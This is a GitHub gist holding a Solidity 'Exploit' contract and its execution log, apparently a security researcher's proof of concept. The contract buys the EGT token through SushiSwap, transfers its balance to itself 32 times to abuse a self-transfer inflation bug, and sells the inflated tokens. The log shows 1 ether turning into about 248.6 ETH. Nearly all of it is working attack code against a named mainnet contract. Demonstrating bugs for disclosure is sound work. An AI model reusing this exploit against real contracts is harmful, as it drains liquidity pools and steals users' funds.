Created
March 19, 2021 06:44
-
-
Save samczsun/4fe1c099f956fac991a25be78cfa73a9 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
pragma solidity 0.5.12; | |
import "./scripts/script.sol"; | |
import "./scripts/sushiswap.sol"; | |
contract Exploit is script { | |
function run() public { | |
run(this.exploit) | |
.withBalance(1 ether); | |
} | |
ERC20Like private constant EGT = ERC20Like(0x2aA5cE395b00CC486159aDbDD97c55b535CF2cf9); | |
function exploit() external { | |
sushiswap.buyWithEth(EGT, 1 ether); | |
fmt.printf("egt=%.18u\n", abi.encode(EGT.balanceOf(address(this)))); | |
for (uint i = 0; i < 32; i++) { | |
EGT.transfer(address(this), EGT.balanceOf(address(this))); | |
} | |
fmt.printf("egt=%.18u\n", abi.encode(EGT.balanceOf(address(this)))); | |
sushiswap.sellForEth(EGT, EGT.balanceOf(address(this))); | |
fmt.printf("eth=%.18u\n", abi.encode(address(this).balance)); | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[#] running script "Exploit" on block 12067632 | |
[#] running "exploit()" as 0x020226Bb5e418FD8A5B55a8B227B1961f96f2653 with 1.000000000000000000 ether | |
[0x020226Bb5e418FD8A5B55a8B227B1961f96f2653] egt=0.999999999999999999 | |
[0x020226Bb5e418FD8A5B55a8B227B1961f96f2653] egt=4294967295.999999995432054800 | |
[0x020226Bb5e418FD8A5B55a8B227B1961f96f2653] eth=248.606092341323214467 | |
[#] finished running "exploit()" | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment